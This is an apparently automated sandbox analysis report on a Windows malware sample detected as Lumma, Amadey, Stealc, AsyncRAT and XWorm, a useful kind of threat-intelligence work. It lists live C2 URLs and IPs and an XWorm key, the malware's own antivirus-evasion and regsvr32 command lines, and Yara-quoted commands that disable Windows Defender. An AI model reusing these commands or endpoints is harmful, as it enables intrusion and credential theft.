Edit tour

Windows Analysis Report
DbCMTMgeJo.exe

Overview

General Information

Sample name:	DbCMTMgeJo.exe renamed because original name is a hash value
Original sample name:	23482d0db1c18055f4fd4620bb6c49e8.exe
Analysis ID:	1604527
MD5:	23482d0db1c18055f4fd4620bb6c49e8
SHA1:	a96d3e9cc9dada2e9f207904c8142b97dd06e5b5
SHA256:	9911fd0a27e8221ca6be055443e9dda8985e9f79c761efb6ecabaa095567ec71
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected BrowserPasswordDump

Yara detected Keylogger Generic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected Stealc

Yara detected StormKitty Stealer

Yara detected Vidar stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Compiles code for process injection (via .Net compiler)

Compiles code to access protected / encrypted code

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Writes many files with high entropy

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: DNS Query Request By Regsvr32.EXE

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Sigma detected: Suspicious Copy From or To System Directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DbCMTMgeJo.exe (PID: 3812 cmdline: "C:\Users\user\Desktop\DbCMTMgeJo.exe" MD5: 23482D0DB1C18055F4FD4620BB6C49E8)

UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe" MD5: 22FA459B401FF64C9B44F00D0585E836)

EUONBTH0X1WAZ900JF4PYRKDM.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)

skotes.exe (PID: 3160 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)

skotes.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 96EBC92F2EB23FAAE578CEC7E20032E6)

c153ad0ce0.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe" MD5: 3E24B5C245488779F5E6D568A99FC0A9)

c153ad0ce0.exe (PID: 6388 cmdline: "C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe" MD5: 3E24B5C245488779F5E6D568A99FC0A9)

WerFault.exe (PID: 6524 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 956 MD5: C31336C1EFC2CCB44B4326EA793040F2)

63460ff8c7.exe (PID: 2624 cmdline: "C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe" MD5: F2432FDB07CAC95C4481843FF0E77FD7)

cmd.exe (PID: 6044 cmdline: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 320 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3848 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1988 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1536 cmdline: cmd /c md 36469 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 760 cmdline: extrac32 /Y /E Geographic MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 5956 cmdline: findstr /V "TEAMS" Mw MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5980 cmdline: cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 4828 cmdline: cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Avoiding.com (PID: 2696 cmdline: Avoiding.com L MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 4616 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

1639401074.exe (PID: 3792 cmdline: "C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe" MD5: 67EBBA5CD77B2452A5EF6A335CC057F9)

21aaa725bd.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

21aaa725bd.tmp (PID: 4712 cmdline: "C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp" /SL5="$50482,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" MD5: BCC236A3921E1388596A42B05686FF5E)

21aaa725bd.exe (PID: 6640 cmdline: "C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

21aaa725bd.tmp (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp" /SL5="$80484,1104885,161792,C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)

regsvr32.exe (PID: 6552 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 6404 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 4028 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8ec89b23d4.exe (PID: 1520 cmdline: "C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)

cmd.exe (PID: 6828 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 3004 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1336 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1516 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3960 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 3892 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 3280 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 3236 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5148 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

5ec73896e9.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe" MD5: C57C72458776A0B6A653F6C828C229F2)

csc.exe (PID: 2820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB10.tmp" "c:\Users\user\AppData\Local\Temp\gaqlxgdr\CSCB36A130CAC24B60A582C1D3CEEF98E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

svchost.exe (PID: 4324 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1252 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5256 -ip 5256 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 5276 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}

Threatname: LummaC

{"C2 url": "https://warlikedbeliev.org/api", "Build Version": "PsFKDg--pablo"}

Threatname: Xworm

{"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2146220338.000000000175D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000022.00000002.4520725848.0000000002110000.00000040.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9aa5:$s6: VirtualBox 0x9a03:$s8: Win32_ComputerSystem 0xa5a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa644:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa759:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa103:$cnc4: POST / HTTP/1.1
00000000.00000003.2122311529.0000000001764000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x675db:$sk01: LimerBoy/StormKitty 0x7b2e7:$str01: set_sUsername 0x7b2a5:$str03: set_sExpMonth 0x7b115:$str04: WritePasswords 0x7b0de:$str05: WriteCookies 0x722aa:$str06: sChromiumPswPaths 0x722bc:$str07: sGeckoBrowserPaths 0x9591b:$str10: encrypted_key":"(.*?)"
00000022.00000002.4535309976.000000001C580000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x93e40:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x93eb2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x93f3c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x93fce:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x94038:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x940aa:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x94140:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x941d0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.2304712572.0000000000121000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000002.4535552791.000000001C730000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
00000003.00000003.2238846734.0000000005190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2104690253.0000000001755000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000022.00000002.4516843364.000000000062B000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2a1e5:$s6: VirtualBox 0x2a143:$s8: Win32_ComputerSystem 0x2ace7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ad84:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2ae99:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2a843:$cnc4: POST / HTTP/1.1
00000000.00000003.2122359158.0000000001705000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.2264398494.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2341932684.0000000000FB1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2285594803.0000000000D21000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
00000000.00000003.2105985714.0000000001758000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2122416229.000000000171D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
